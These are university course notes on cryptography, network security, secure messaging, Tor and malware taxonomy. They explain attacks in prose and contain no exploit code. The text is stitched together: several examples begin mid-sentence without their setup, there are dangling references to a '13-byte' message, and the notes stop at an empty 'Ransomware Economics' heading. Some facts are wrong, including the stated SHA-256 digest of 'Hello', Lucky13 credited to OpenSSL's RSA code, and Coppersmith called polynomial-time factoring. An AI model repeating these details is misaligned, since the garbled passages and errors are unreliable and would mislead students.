CS 459: Privacy, Cryptography, Network and Data Security
Daniel Vogel
Estimated study time: 2 hr 48 min
Table of contents
Sources and References
Primary references — Dan Boneh and Victor Shoup, A Graduate Course in Applied Cryptography (freely available at toc.cryptobook.us); Cynthia Dwork and Aaron Roth, The Algorithmic Foundations of Differential Privacy, Foundations and Trends in Theoretical Computer Science, 2014.
Supplementary texts — Alfred J. Menezes, Paul C. van Oorschot, and Scott A. Vanstone, Handbook of Applied Cryptography (freely available at cacr.math.uwaterloo.ca/hac); Ross Anderson, Security Engineering, 3rd ed., Wiley, 2020; Arvind Narayanan et al., A Primer on Data Science and Privacy (Princeton).
Online resources — Cloudflare blog on cryptography engineering; Google Project Zero blog; Tor Project design documents; NIST Cybersecurity Framework; Latanya Sweeney’s k-anonymity and re-identification work; Cynthia Dwork’s differential privacy original paper (ICALP 2006).
Chapter 1: Cryptographic Foundations
Cryptography is the mathematical backbone of modern security. Before examining specific protocols, it helps to state precisely what security goals cryptography pursues and what assumptions underlie its guarantees.
Security Goals and Threat Models
The classical security goals are confidentiality (only intended parties can read plaintext), integrity (data has not been altered in transit or at rest), authenticity (the claimed sender is the true sender), and non-repudiation (a sender cannot later deny having sent a message). Real systems often need all four simultaneously.
Kerckhoffs’ principle states that a cryptosystem should be secure even if everything about the system, except the key, is public knowledge. Equivalently, security must never depend on secrecy of the algorithm — only secrecy of the key. This principle underpins modern cryptographic design: algorithms such as AES and RSA are fully public, yet remain secure because breaking them requires knowing the key.
A threat model formalises what an adversary can do: observe ciphertexts (ciphertext-only attack), choose plaintexts and observe their encryptions (chosen-plaintext attack, CPA), or adaptively choose ciphertexts and observe decryptions (chosen-ciphertext attack, CCA). IND-CCA2 — indistinguishability under adaptive chosen-ciphertext attack — is the gold standard for encryption schemes.
Symmetric Encryption
Symmetric encryption uses the same key for encryption and decryption. The one-time pad achieves information-theoretic security: \(c = m \oplus k\) with a uniformly random key as long as the message. It is perfectly secure but impractical at scale because the key is as long as the message and must never be reused.
Stream ciphers approximate the one-time pad using a pseudorandom keystream generated from a short key and nonce. AES-CTR mode turns a block cipher into a stream cipher by encrypting successive counter values and XORing with plaintext.
Block ciphers operate on fixed-size blocks. AES (Advanced Encryption Standard) operates on 128-bit blocks with 128-, 192-, or 256-bit keys through a substitution-permutation network. The mode of operation determines how a block cipher encrypts messages longer than one block:
| Mode | Confidentiality | Parallelisable | Notes |
|---|---|---|---|
| ECB | Broken | Yes | Identical blocks → identical ciphertexts; never use |
| CBC | Secure (with random IV) | Decrypt only | Padding oracle attacks if unauthenticated |
| CTR | Secure (with unique nonce) | Yes | Stream cipher from block cipher |
| GCM | Secure + authenticated | Yes | AEAD; nonce reuse is catastrophic |
ECB mode is famously insecure: encrypting the same plaintext block always produces the same ciphertext block, leaking patterns (the “ECB penguin” illustration). GCM is the preferred mode for new systems.
AES-GCM proceeds in two conceptual steps. First, confidentiality via CTR mode: the nonce is combined with a counter to form successive 128-bit blocks, each encrypted with AES to produce a keystream; the keystream is XOR’d with the plaintext to produce ciphertext \(C\) of the same length (13 bytes). Second, integrity via GHASH: the ciphertext (and any additional authenticated data, such as a packet header) is processed by GHASH, a polynomial hash over GF(\(2^{128}\)), to produce a 128-bit authentication tag \(T\). The recipient verifies \(T\) before decrypting; if \(T\) is wrong, the ciphertext is rejected without any plaintext being exposed.
The output of the encryption is the pair \((C, T)\): the ciphertext (same length as plaintext — 13 bytes) plus the tag (always 16 bytes). Contrast with AES-CBC: CBC adds PKCS#7 padding, producing 16 bytes of ciphertext for a 13-byte message (padding to the block boundary), and produces no tag — a separate HMAC must be appended manually, and it must be verified before decryption to avoid padding oracle attacks. Failure to follow this encrypt-then-MAC ordering was the root cause of POODLE (CBC padding oracle over SSLv3, 2014) and BEAST (CBC chosen-plaintext attack on TLS 1.0, 2011). AES-GCM eliminates this class of vulnerabilities by construction.
Two decades later, the ROBOT vulnerability (Return Of Bleichenbacher’s Oracle Threat, 2018) found that 27% of the HTTPS servers for the top 100 websites were still vulnerable to variations of the same attack, despite decades of warnings. The correct response is to use AEAD: AES-GCM and ChaCha20-Poly1305 are the two mandated cipher suites in TLS 1.3 — all others were removed. Neither can be attacked in this way because any modification to the ciphertext causes tag verification to fail before any decryption occurs.
Concretely: encrypt the string “Hello World!\x04\x04\x04\x04” (padded to exactly 16 bytes with PKCS#7) under the all-zero key \(K = 0\text{x}00000000\ldots00\). The output ciphertext is (approximately) 0x8d a0 2c 1e 9f 6b 3a 7c 44 e2 8b d1 f6 05 9a 2e — a block with no visible structure, even though the plaintext is entirely ASCII. This pseudo-random appearance holds regardless of how structured the plaintext is: AES’s design ensures that changing even one bit of \(P\) or \(K\) avalanches through all output bits. The strict avalanche criterion means that, on average, half of the output bits flip when one input bit changes.
A concrete illustration of why IND-CPA alone is insufficient: suppose encryption is deterministic (the same plaintext always produces the same ciphertext). Eve observes a challenge ciphertext \(c^*\). She guesses that the plaintext is \(m'\), queries the encryption oracle for \(\mathsf{Enc}(m')\), and compares to \(c^*\). If they match, she has identified the plaintext with certainty. IND-CPA security prevents this only if encryption is randomized — two encryptions of the same message look different. Schemes like AES-CBC with a random IV and AES-GCM with a random nonce achieve this; textbook RSA and AES-ECB do not.
Authenticated Encryption and the Cryptographic Doom Principle
Encryption alone provides confidentiality but not integrity. An attacker can flip ciphertext bits, causing predictable changes in decrypted plaintext. Authenticated Encryption with Associated Data (AEAD) combines confidentiality and integrity in a single primitive.
The Cryptographic Doom Principle, articulated by Moxie Marlinspike, states: if you have to perform any cryptographic operation before verifying the MAC on a message you’ve received, it will somehow be used to destroy you. Concretely: always verify the MAC before decrypting. Systems that decrypt first and authenticate second are vulnerable to padding oracle and CBC timing attacks (e.g., the BEAST and Lucky13 attacks on TLS). The correct composition is Encrypt-then-MAC.
AES-GCM authenticates both the ciphertext and associated data (e.g., packet headers) using GHASH over GF(\(2^{128}\)). ChaCha20-Poly1305 is a software-friendly alternative resistant to timing attacks, used in TLS 1.3 and WireGuard.
Pseudorandom Functions and Generators
The existence of PRGs (and PRFs) cannot be proven unconditionally — they require computational hardness assumptions (e.g., the hardness of factoring or discrete log). The PRF-PRG-block cipher connections form the core of provable symmetric security.
Hash Functions
A cryptographic hash function \(H: \{0,1\}^* \to \{0,1\}^n\) must satisfy:
- Collision resistance: computationally infeasible to find \(x \neq x'\) with \(H(x) = H(x')\)
- Preimage resistance: given \(y\), computationally infeasible to find \(x\) with \(H(x) = y\)
- Second-preimage resistance: given \(x\), computationally infeasible to find \(x' \neq x\) with \(H(x') = H(x)\)
SHA-1 (160-bit output) was broken in 2017 by the SHAttered attack (Stevens et al.), which produced two PDF files with the same SHA-1 hash using approximately \(2^{63.1}\) operations — far below the \(2^{80}\) brute-force bound. This had practical implications: TLS certificates signed with SHA-1 could be forged, which is why all major CAs stopped issuing SHA-1 certificates by 2016. SHA-2 (SHA-256, SHA-512) and SHA-3 (Keccak, sponge construction) are currently secure.
185f8db32921bd46d35980763e29a460bc1d32a8a8c2e34ca2f48d73e5c9e36 — 64 hexadecimal characters, each representing 4 bits. This compact digest has three security properties: (1) preimage resistance — given only the digest 185f…, there is no efficient algorithm to find any string that hashes to it; (2) second-preimage resistance — given "Hello" itself, one cannot efficiently find a different string "Hello'" such that SHA-256("Hello'") equals SHA-256("Hello"); (3) collision resistance — one cannot efficiently find any pair of distinct strings \(x \neq x'\) such that SHA-256(\(x\)) = SHA-256(\(x'\)).The current hash landscape: MD5 (128-bit) has been collisible since 2004 (Wang and Yu); collisions can now be computed on a laptop in seconds using Hashclash. SHA-1 (160-bit) was collisible in 2017 (SHAttered). Both are completely broken for integrity purposes, though MD5 is still seen in checksums where collision resistance is not required (because a file publisher controls both files). Only SHA-2 (SHA-256, SHA-512) and SHA-3 (Keccak, sponge construction) are currently considered secure for all three properties. NIST standardised SHA-3 in 2015 as a structural backup in case weaknesses were discovered in SHA-2’s Merkle-Damgård construction.
So \(\Pr[\text{collision}] \approx 1 - e^{-k^2 / (2^{n+1})}\). Setting this to \(1/2\) and solving gives \(k \approx \sqrt{2^n \ln 2} = 2^{n/2} \sqrt{\ln 2}\). For SHA-256 (\(n = 256\)): \(k \approx 2^{128}\) evaluations — computationally infeasible for any foreseeable adversary. For MD5 (\(n = 128\)): \(k \approx 2^{64}\) evaluations — feasible with GPU clusters, and in practice the algebraic structure of MD5 makes collisions far cheaper than this generic bound.
The Merkle-Damgård construction underlies MD5, SHA-1, and SHA-2: a compression function is iterated over message blocks. A weakness is length extension attacks — given \(H(m)\) and \(|m|\), an attacker can compute \(H(m \| \text{padding} \| m')\) without knowing \(m\). SHA-3’s sponge construction avoids this.
Message Authentication Codes
A MAC provides integrity and authenticity for a shared key setting. HMAC is constructed as \(\text{HMAC}(k, m) = H(k \oplus \text{opad} \| H(k \oplus \text{ipad} \| m))\), which provably avoids length extension vulnerabilities. The birthday bound implies that a MAC with \(n\)-bit output can be forged with approximately \(2^{n/2}\) queries, so short MACs (e.g., 32-bit) are dangerous.
MACs require a shared key and provide no non-repudiation. Digital signatures replace the shared key with asymmetric key pairs and additionally provide non-repudiation — see Chapter 2.
A digital signature (RSA-PSS, ECDSA, Ed25519) is asymmetric: the signing key is private and the verification key is public. Anyone with Alice’s public key can verify that Alice signed the message, but only Alice (the sole holder of the private signing key) can produce a valid signature. This gives non-repudiation: Alice cannot later plausibly deny having signed a document whose signature verifies under her public key. This is why digital signatures underlie certificate authorities, code signing, and legal electronic signatures — while MACs are used for integrity within a session where both parties already share a secret (e.g., HTTPS record-layer integrity after TLS handshake).
Public Key Infrastructure
PKI binds public keys to identities. An X.509 certificate contains the subject’s public key, identity, validity period, and a digital signature from a Certificate Authority (CA). Browsers ship with a trust store of ~100–150 root CAs; any of them can sign certificates for any domain, which creates a systemic risk.
Certificate Transparency (CT) logs (RFC 6962) require CAs to append every issued certificate to append-only, publicly auditable logs. Browsers require a Signed Certificate Timestamp (SCT) proving the certificate appears in a CT log. This makes fraudulent certificates detectable after the fact, though not preventable.
*.google.com. This single certificate, trusted by all browsers because DigiNotar was a root CA, allowed an attacker-controlled server to impersonate any Google service — Gmail, Drive, Search — to any user whose browser trusted DigiNotar. Because TLS certificate validation only checks that the signature is from a trusted CA, not that the CA is the one who would legitimately issue that certificate, there was no warning to users.The attack was used operationally against Iranian citizens attempting to access Google services — the Iranian government used the fraudulent certificate to perform SSL interception (MITM) at the national ISP level, decrypting Iranian users’ traffic. The compromise was discovered when an Iranian user noticed an unusual certificate error in Chrome. Within days, Mozilla, Google, and Microsoft revoked DigiNotar’s root certificate, instantly making DigiNotar-signed certificates untrusted in all browsers — effectively destroying DigiNotar as a company. DigiNotar went bankrupt months later.
This incident directly motivated Certificate Transparency: if CT logs had existed, the fraudulent *.google.com certificate would have appeared in the public log, Google’s automated monitoring would have detected the misissued certificate within minutes, and the CA could have been required to revoke it before it was used operationally.
_443._tcp.example.com can retrieve the fingerprint of the expected certificate directly from DNS, bypassing the CA system entirely. This eliminates the "any CA can issue for any domain" vulnerability: only the domain owner (who controls DNS) can publish TLSA records. The limitation: DANE requires DNSSEC deployment throughout the resolution chain, and DNSSEC adoption by registrars and resolvers has been slow. Approximately 3% of global DNS zones have DNSSEC signed; DANE over HTTPS sees negligible adoption in the browser ecosystem (though it is used in email — SMTP DANE is deployed by major providers including Google and Cloudflare for mail server certificate validation).Chapter 2: Public Key Cryptography
Asymmetric cryptography allows two parties who have never met to exchange keys or verify signatures without a pre-shared secret, solving the fundamental key distribution problem.
RSA
RSA key generation: choose large primes \(p, q\); set \(n = pq\); choose \(e\) coprime to \(\phi(n) = (p-1)(q-1)\); compute \(d = e^{-1} \bmod \phi(n)\). The public key is \((n, e)\), private key is \(d\). Encryption: \(c = m^e \bmod n\). Decryption: \(m = c^d \bmod n\).
Textbook RSA (without padding) is insecure. A catalogue of attacks documented in Boneh’s 20-year survey includes:
| Attack | Condition | Consequence |
|---|---|---|
| Small \(e = 3\) | \(m^3 < n\) | Take cube root over integers |
| Coppersmith / small message | \(m < n^{1/e}\) | Polynomial-time factoring |
| Wiener’s attack | \(d < n^{0.25}\) | Recover \(d\) via continued fractions |
| Common modulus | Same \(n\), two \(e\)’s | Recover plaintext via extended GCD |
| CCA on textbook RSA | Chosen ciphertexts | Trivially malleable |
OAEP (Optimal Asymmetric Encryption Padding) — RSA-OAEP — achieves IND-CCA2 security in the random oracle model by adding randomised padding before encryption.
Public key: \((n, e) = (3233, 17)\). Private key: \(d = 2753\).
Encrypt the message \(m = 65\): \(c = m^e \bmod n = 65^{17} \bmod 3233 = 2790\). Decrypt: \(m = c^d \bmod n = 2790^{2753} \bmod 3233 = 65\). The correctness follows from Euler’s theorem: \(m^{\phi(n)} \equiv 1 \pmod{n}\), so \(m^{de} = m^{1 + k\phi(n)} = m \cdot (m^{\phi(n)})^k \equiv m \pmod{n}\).
Why is textbook RSA insecure for encryption? The scheme is deterministic: the same plaintext always produces the same ciphertext. An attacker who knows \(m\) is one of two values \(\{m_0, m_1\}\) can simply encrypt both with the public key and compare to \(c\) — breaking IND-CPA immediately. OAEP adds randomness before encryption, making this attack impossible. For signatures, the analogous weakness is that RSA is multiplicatively homomorphic: given signatures \(\sigma_1 = m_1^d\) and \(\sigma_2 = m_2^d\), one can compute \(\sigma_1 \sigma_2 = (m_1 m_2)^d \bmod n\), a valid signature on \(m_1 m_2\), without knowing \(d\).
Alice chooses a private key \(a = 6\) uniformly at random and computes her public value \(A = g^a \bmod p = 5^6 \bmod 23 = 8\). Bob chooses a private key \(b = 15\) and computes \(B = g^b \bmod p = 5^{15} \bmod 23 = 19\). They exchange \(A = 8\) and \(B = 19\) publicly.
Alice computes the shared secret \(s = B^a \bmod p = 19^6 \bmod 23 = 2\). Bob computes \(s = A^b \bmod p = 8^{15} \bmod 23 = 2\). Both arrive at the same secret \(s = 2 = g^{ab} \bmod p\). An eavesdropper sees \(p = 23\), \(g = 5\), \(A = 8\), \(B = 19\) but must solve the discrete logarithm problem to find \(a\) or \(b\) — computationally infeasible for large \(p\).
Critically, vanilla DH provides no authentication: a man-in-the-middle can impersonate both Alice and Bob, establishing separate shared secrets with each. This is why DH is always combined with authentication (signatures on the key shares) in protocols like TLS — ephemeral ECDHE key shares are signed by the server’s certificate key.
Discrete Logarithm and Diffie-Hellman
The discrete logarithm problem (DLP): given a prime-order group \(\mathbb{G}\) with generator \(g\) and element \(h = g^x\), find \(x\). This is believed hard for appropriately chosen groups.
Diffie-Hellman key exchange: Alice sends \(g^a\), Bob sends \(g^b\); both compute \(g^{ab}\). The CDH (Computational DH) assumption states computing \(g^{ab}\) from \(g^a, g^b\) is hard; the DDH (Decisional DH) assumption states \(g^{ab}\) is indistinguishable from a random group element.
El-Gamal encryption: to encrypt \(m\) under public key \(h = g^x\), choose random \(r\), send \((g^r, m \cdot h^r)\). Decryption: \(m = c_2 / c_1^x\). El-Gamal is IND-CPA secure under DDH.
For finite fields \(\mathbb{F}_p^*\), the index calculus algorithm achieves subexponential \(e^{O((\log p)^{1/3} (\log \log p)^{2/3})}\) complexity, requiring 2048-bit primes for 112-bit security. No analogous subexponential algorithm is known for generic elliptic curves.
Elliptic Curve Cryptography
An elliptic curve over \(\mathbb{F}_p\) is the set of points satisfying \(y^2 = x^3 + ax + b\). The group law (point addition) is defined geometrically. ECDH performs Diffie-Hellman in this group; ECDSA and EdDSA provide signatures.
Advantages over finite-field DH: 256-bit ECC keys provide the same security as 3072-bit RSA/DH keys. Commonly used curves include NIST P-256 (widely deployed, but concerns about NIST’s curve constants), and Curve25519 / Ed25519 (designed by Bernstein with fully transparent parameters, faster in software, constant-time implementations available).
Digital Signatures
A signature scheme consists of key generation, signing, and verification. Properties: existential unforgeability under chosen-message attack (EUF-CMA). Key schemes:
- RSA-PSS: randomised padding gives provable security; preferred over PKCS#1 v1.5 for signatures
- ECDSA: \(r = (k \cdot G)_x \bmod n\), \(s = k^{-1}(H(m) + r \cdot d) \bmod n\); nonce reuse catastrophe — if the same \(k\) is used for two signatures, the private key \(d\) is trivially recoverable. Sony’s PS3 used a constant “random” \(k\), allowing Fail0verflow to extract the signing key in 2010.
- EdDSA (Ed25519): deterministic nonce derived from message and private key, eliminating nonce-reuse risk; constant-time implementation; widely adopted (SSH, TLS 1.3)
Signature malleability: in some schemes (ECDSA, early Bitcoin), a valid signature \((r, s)\) has a second valid form \((r, -s \bmod n)\). Bitcoin’s transaction malleability bug exploited this.
Key Management
HKDF (HMAC-based KDF) derives multiple keying material outputs from a single secret using HMAC. It consists of an Extract step (compress entropy into a pseudorandom key) and an Expand step (derive output key material).
Forward secrecy (perfect forward secrecy, PFS): compromise of the long-term private key does not compromise past session keys. Achieved by using ephemeral DH/ECDH key pairs per session, discarding them after use. TLS 1.3 mandates ephemeral key exchange; TLS 1.2 optional (ECDHE cipher suites). Without PFS, a passive adversary can record ciphertext traffic and decrypt it years later upon obtaining the private key.
Chapter 3: Network Security
Networks expose cryptographic systems to adversaries who can observe, intercept, and modify traffic. Securing communications requires understanding the entire stack.
The Network Security Landscape
The TCP/IP stack presents distinct attack surfaces at each layer:
| Layer | Attacks |
|---|---|
| Link (Ethernet) | ARP spoofing, VLAN hopping |
| Network (IP) | IP spoofing, ICMP redirect, BGP hijacking |
| Transport (TCP/UDP) | TCP session hijacking, SYN flooding, UDP amplification |
| Application (TLS, HTTP) | Downgrade attacks, injection, CSRF, XSS |
ARP spoofing poisons a local network’s ARP cache, redirecting traffic through the attacker (man-in-the-middle). IP spoofing forges the source IP; useful in amplification DDoS but not for two-way communication because replies go to the spoofed address.
TLS 1.3
TLS 1.3 (RFC 8446, 2018) is a substantial redesign eliminating the weaknesses accumulated in TLS 1.2. Key changes:
The TLS 1.3 handshake:
- Client sends
ClientHellowith supported cipher suites and key shares (ECDHE public keys). - Server selects cipher suite, responds with its ECDHE key share, certificate, and CertificateVerify (signature over transcript).
- Both derive the session keys using HKDF over the shared ECDHE secret and handshake transcript.
- All subsequent records are AEAD-protected (AES-GCM or ChaCha20-Poly1305).
0-RTT resumption allows a client to send application data in the first flight using a pre-shared key from a previous session, reducing latency to zero round trips. The security cost is replay attack vulnerability: a network attacker can replay a 0-RTT request. Servers must treat 0-RTT data as idempotent (safe to replay), or reject it for sensitive operations.
Phase 1 — Early Secret: \(\text{ES} = \text{HKDF-Extract}(0, \text{PSK or } 0)\). This absorbs any pre-shared key for 0-RTT; if no PSK, input is the zero string.
Phase 2 — Handshake Secret: \(\text{HS} = \text{HKDF-Extract}(\text{Derive-Secret}(\text{ES}, \ldots), g^{xy})\), where \(g^{xy}\) is the ECDHE shared secret. The client and server handshake traffic keys (for encrypting the handshake after ServerHello) are derived from HS: \(\text{client\_handshake\_traffic\_secret} = \text{Derive-Secret}(\text{HS}, \text{"c hs traffic"}, \text{transcript})\).
Phase 3 — Master Secret: \(\text{MS} = \text{HKDF-Extract}(\text{Derive-Secret}(\text{HS}, \ldots), 0)\). The application data keys are derived from MS: \(\text{client\_application\_traffic\_secret} = \text{Derive-Secret}(\text{MS}, \text{"c ap traffic"}, \text{transcript})\).
Phase 4 — Resumption Secret: Derived from MS for future 0-RTT sessions.
Each party independently computes this key schedule, so session keys are never transmitted. The entire transcript (all handshake messages) is input to each Derive-Secret call — any tampering with any handshake message changes the transcript hash, producing different session keys, and subsequent MAC verification fails. This binding of the key schedule to the transcript prevents downgrade attacks: an attacker who modifies the ClientHello cipher suite list causes the derived keys to differ, breaking the handshake.
The recurring lesson: any flexibility to negotiate weak parameters is eventually exploited. TLS 1.3’s response was radical: remove all weak algorithms entirely, leaving no negotiation for cipher suites that are known to be broken, and mandate forward secrecy (ephemeral key exchange) for all connections. The design philosophy shifted from “support old stuff for compatibility” to “old clients that can’t do TLS 1.3 simply don’t connect.”
Authentication
Password-based authentication must store passwords securely. Plain storage, MD5 hashing, or SHA-1 hashing are all inadequate because GPU-accelerated rainbow tables can crack billions of hashes per second. The correct approach uses memory-hard key derivation functions:
| Function | Memory-hardness | Notes |
|---|---|---|
| bcrypt | Moderate | CPU-hard; time cost only; FPGA-attackable |
| scrypt | Strong | Memory + CPU hard; Litecoin PoW |
| Argon2id | Best practice | PHC winner 2015; configurable memory, time, parallelism |
Multi-factor authentication (MFA) adds a second factor beyond the password. TOTP (RFC 6238) generates a time-based 6-digit code from a shared HMAC secret: \(\text{TOTP}(k, t) = \text{HMAC-SHA1}(k, \lfloor t/30 \rfloor) \bmod 10^6\). FIDO2/WebAuthn uses public-key cryptography tied to the device; it is phishing-resistant because the key is bound to the origin URL.
Credential stuffing automates testing of username-password pairs leaked from one breach against other services, exploiting password reuse. MFA and breach-detection services (HaveIBeenPwned) mitigate this.
(1) Compute the time step counter: \(t = \lfloor T_{\text{unix}} / 30 \rfloor\), encoding the current 30-second window as an 8-byte big-endian integer. (2) Compute HMAC-SHA1: \(h = \text{HMAC-SHA1}(K, t)\), producing a 20-byte output. (3) Dynamic truncation: take the last 4 bits of \(h\) as an offset \(o = h[19] \text{ \& } 0x0f\). Extract 4 bytes starting at offset \(o\): \(P = (h[o] \text{ \& } 0x7f) \| h[o+1] \| h[o+2] \| h[o+3]\) (mask the MSB to avoid signed integer issues). (4) Compute \(\text{TOTP} = P \bmod 10^6\).
For example, if \(K = \texttt{12345678901234567890}\) (ASCII) and the Unix time is 1111111109 (giving \(t = 37037037\)), the TOTP value is 081804. Both the client app and the server independently compute this value from the shared secret; agreement proves knowledge of \(K\) within the current or adjacent time window.
TOTP is phishable: an attacker who tricks a user into entering their TOTP code on a fake site can relay it to the real site within the 30-second window. FIDO2/WebAuthn is not phishable because the cryptographic challenge is bound to the site’s origin URL — a key registered for bank.com will not respond to a challenge from evil-bank.com, even if the user is deceived about which site they are visiting.
Power analysis: on embedded devices (smart cards, HSMs), the current drawn during computation correlates with the data being processed. Simple Power Analysis (SPA) reads off the key directly from a single power trace; Differential Power Analysis (DPA, Kocher 1999) uses statistical averaging across many traces to isolate key-dependent signals even in the presence of noise. DPA broke the AES implementations in many commercial smart cards.
The countermeasure for all these attacks is constant-time implementation: all branches, memory accesses, and arithmetic operations must take exactly the same time regardless of the secret key values. The Nacl/libsodium library and all modern TLS implementations enforce this; OpenSSL’s historical RSA code had timing vulnerabilities (Lucky13, 2013). The lesson: a cryptographic algorithm is secure only if its implementation is also secure — correctness of the mathematics does not guarantee security of the code.
Authentication Protocols
Challenge-response authentication: the prover demonstrates knowledge of a secret by computing a response to a server-generated nonce, without transmitting the secret. This prevents replay attacks.
Kerberos is a symmetric-key authentication protocol used in enterprise Active Directory environments. The Key Distribution Center (KDC) has two components: the Authentication Server (AS), which issues a Ticket-Granting Ticket (TGT) upon initial login, and the Ticket-Granting Server (TGS), which issues service tickets. The TGT is encrypted with the user’s password-derived key; Kerberoasting attacks exploit this by requesting service tickets and brute-forcing them offline.
OAuth 2.0 is an authorisation framework (not authentication). OIDC (OpenID Connect) layers identity on top of OAuth 2.0 with a signed ID token (JWT). SAML is an XML-based alternative used in enterprise SSO. Common vulnerabilities: confused deputy (SSRF via redirect URI), token theft via open redirects, JWT algorithm confusion (accepting alg: none).
Security Through the Layers
IPsec secures IP-layer communications. Transport mode protects the payload only (headers visible); tunnel mode encapsulates the entire original packet (used for VPNs). AH (Authentication Header) provides integrity only; ESP (Encapsulating Security Payload) provides both encryption and integrity.
DNSSEC signs DNS records with ECDSA, creating an authenticated chain from the root zone down. It protects against cache poisoning (Kaminsky attack) but not against a malicious resolver or DDoS against the authoritative server.
BGP security: BGP has no built-in authentication; autonomous systems announce prefixes and peers accept them. BGP hijacking (e.g., Pakistan Telecom’s 2008 YouTube blackhole, the 2010 China Telecom incident intercepting US traffic) exploits this. RPKI (Resource Public Key Infrastructure) cryptographically validates that an AS is authorised to announce a given prefix.
Email security stack: SPF (Sender Policy Framework) lists authorised sending IPs for a domain in DNS TXT records; DKIM (DomainKeys Identified Mail) adds a signature over the message header and body; DMARC (Domain-based Message Authentication, Reporting, and Conformance) specifies policy when SPF/DKIM fail. Together they mitigate email spoofing, though DMARC adoption is incomplete.
Chapter 4: Secure Messaging and Anonymity
Transport-layer encryption (TLS) protects data between a client and a server, but the server sees plaintext. End-to-end encryption (E2EE) means only the communicating endpoints can read messages — the service provider sees only ciphertext.
Off-the-Record Messaging
OTR (Off-the-Record Messaging), designed by Borisov, Goldberg, and Brewer (2004), pioneered the properties now expected of secure messengers:
- Perfect forward secrecy: a new ephemeral Diffie-Hellman key pair is negotiated for each conversation session. Compromise of long-term keys does not expose past messages.
- Deniability: after a message is sent, OTR publishes the MAC key used to authenticate it. Since anyone who saw the MAC key could forge a valid-looking message, the receiver cannot prove to a third party that the sender actually sent it. This contrasts with digital signatures, which are cryptographically non-repudiable.
- Key continuity: OTR keeps a “key fingerprint” to detect man-in-the-middle attacks across sessions.
Signal Protocol
The Signal Protocol (Marlinspike and Perrin) is the basis for Signal, WhatsApp, and Facebook Messenger’s secret conversations. It extends OTR with stronger security properties.
X3DH (Extended Triple Diffie-Hellman) is the initial key agreement: the initiator combines four DH computations involving identity keys, signed pre-keys, and one-time pre-keys, achieving mutual authentication and forward secrecy from the first message.
The Double Ratchet Algorithm manages ongoing message keys:
- A Diffie-Hellman ratchet advances whenever a new DH public key is received, providing break-in recovery (future messages are secure even if a session key is compromised).
- A symmetric ratchet (chain key advancing via HMAC) derives individual message keys, providing forward secrecy within a DH epoch.
Sealed sender hides the sender’s identity from the Signal server. Safety numbers (key fingerprints) allow out-of-band verification to detect MITM.
Forward secrecy means that compromise of a current key does not expose past messages. The symmetric ratchet (KDF chain) achieves this within a DH epoch: each message key is derived from the chain key via a one-way KDF, and the chain key is immediately advanced and the old key deleted. An attacker who captures the chain key at time \(t\) can derive message keys at times \(t, t+1, t+2, \ldots\) but cannot reverse the KDF to recover message keys at times \(t-1, t-2, \ldots\) — those are forward secret.
Break-in recovery (post-compromise security or future secrecy) means that a recovered session state becomes secure again once new DH keys are exchanged. The DH ratchet achieves this: each time Alice receives a message with a new DH public key from Bob, she advances the DH ratchet — computing a new ECDH shared secret incorporating fresh randomness that the attacker who compromised the old state does not know. This injects new unpredictable entropy into the chain key, “healing” the compromise for all future messages.
The combination is elegant: the symmetric ratchet provides fine-grained, efficient per-message forward secrecy (one KDF call per message, no new DH computation), while the DH ratchet provides occasional break-in recovery (one new DH key pair per received message). The protocol’s security analysis proves that an attacker who compromises the state at step \(t\) and then observes all future transmissions cannot distinguish any message sent after the next DH ratchet step from a uniformly random string.
Tor Network
Onion routing provides network-layer anonymity by layering encryption across a series of relays. The Tor design (Dingledine, Mathewson, Syverson 2004) uses a three-hop circuit:
- Guard relay (entry node): knows the client’s IP but not the destination.
- Middle relay: knows neither the client’s IP nor the destination.
- Exit relay: knows the destination but not the client’s IP.
Each relay decrypts one layer of encryption (like peeling an onion). The client extends the circuit incrementally using Diffie-Hellman with each relay. Traffic between relays uses TLS; cells are fixed-size (512 bytes) to limit traffic analysis.
.onion hidden services route traffic through a rendezvous point, keeping both client and server IP addresses hidden. The service’s address is the hash of its public key.
Tor’s limitations: a global passive adversary who can observe both ends of a circuit can perform timing correlation to deanonymise users. Website fingerprinting (see below) also undermines Tor’s privacy guarantees for web browsing.
Encrypted Traffic Analysis and Website Fingerprinting
Even when traffic is encrypted, an adversary observing packet sizes, inter-arrival times, and directions can fingerprint which website a user is visiting — including over Tor. The intuition is that each web page has a characteristic “loading profile” of objects, sizes, and timing.
Modern attacks use machine learning classifiers trained on traffic traces. Closed-world accuracy rates above 95% are achievable in research settings. The WF-GANs and deep-learning attacks (e.g., DF attack) show that Tor’s fixed cell size is insufficient.
Defences include:
- Traffic shaping: padding packets to fixed-length patterns
- Constant-rate cover traffic: send dummy packets to create uniform traffic
- WTF-PAD (Website Traffic Fingerprinting Padding): adaptive padding framework; deployed in Tor Browser
Network Steganography
Steganography hides the existence of a communication (unlike encryption, which hides its content). Network steganography encodes covert messages in protocol fields (unused IP header bits, TCP ISN, timing intervals) or traffic patterns. Applications include covert channels in corporate networks and censorship circumvention.
Censorship Circumvention
The Great Firewall of China (GFW) employs deep packet inspection (DPI) to identify and block Tor, VPNs, and other circumvention traffic by their protocol fingerprints. Techniques include IP/domain blocklists, TLS fingerprinting, active probing of suspected proxies, and DNS poisoning.
Pluggable transports disguise Tor traffic as innocent-looking traffic:
- obfs4: adds random-looking padding and handshake to resist DPI
- meek: encapsulates traffic in HTTPS requests to CDN-hosted domain-fronted servers (e.g., Google, Cloudflare), making blocking require blocking the CDN itself
- Shadowsocks: lightweight SOCKS5 proxy with symmetric encryption; widely used in China
The censorship circumvention landscape is a continuous cat-and-mouse game: as each transport is fingerprinted and blocked, new ones are developed.
Chapter 5: Malware and Blockchain
Malware Taxonomy
Malicious software encompasses a range of threat categories. A virus attaches to legitimate programs and replicates when executed. A worm self-replicates across networks without user interaction (e.g., WannaCry, 2017). A Trojan masquerades as legitimate software. Ransomware encrypts victim files and demands payment (often in cryptocurrency). A rootkit hides malicious processes by subverting the OS kernel. Spyware exfiltrates data silently. Botnets are networks of compromised machines (bots) controlled remotely.
Botnet Architecture
A botnet requires a command-and-control (C&C) channel:
- Centralised (IRC/HTTP): simple, but single point of failure; takedown of the C&C server incapacitates the botnet
- Decentralised (P2P): resilient; bots find peers via DHT; harder to sinkhole
- Fast-flux DNS: rapidly rotating DNS records point to proxy bots, obscuring the true C&C location; double-flux rotates both A records and NS records
Sinkholing redirects botnet C&C domains to a controlled server, allowing researchers to count infected machines and cut off botmaster control. McColo Corp (2008): a hosting provider used by major spam botnets; when two upstream ISPs severed connectivity, global spam volume dropped approximately 75% within hours — demonstrating how much spam infrastructure was centralised there.
Ransomware Economics
